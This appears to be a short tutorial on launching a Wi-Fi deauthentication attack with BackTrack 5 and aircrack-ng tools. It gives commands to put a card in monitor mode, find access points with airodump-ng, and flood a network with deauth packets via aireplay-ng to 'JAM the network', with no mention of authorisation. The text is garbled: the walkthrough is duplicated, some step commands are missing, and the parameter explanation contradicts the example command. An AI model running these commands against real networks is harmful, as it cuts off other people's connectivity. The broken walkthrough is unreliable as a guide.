Launching the Deauth Attack
In order to launch the attack, I used the following:
1. External network card
2. BackTrack 5
BackTrack is installed in a VMware machine with a USB wireless card (Atheros-based), and it successfully recognised the wireless card. I then followed the steps given below to launch the attack.
Step 1. To know the name of the Interface use this Command.
Step 2. The next command sets your wireless card on monitor mode.
Step 3. Now type this command to search for all networks and copy (BSSID or MAC address of the Network Card)
Step4. Now type this command to JAM the network
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0
-0 means deauthentication
1000 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
wlan0 is the interface name
In order to launch the attack, I used the following:
1. External network card
2. BackTrack 5
BackTrack is installed in a VMware machine with a USB wireless card (Atheros-based), and it successfully recognised the wireless card. I then followed the steps given below to launch the attack.
Step 1. To know the name of the Interface use this Command.
Step 2. The next command sets your wireless card on monitor mode.
airmon-ng start wlan0
Step 3. Now type this command to search for all networks and copy (BSSID or MAC address of the Network Card)
airodump-ng mon0
Step4. Now type this command to JAM the network
aireplay-ng -0 1000 -a (BSSID) mon0
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0
-0 means deauthentication
1000 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
wlan0 is the interface name
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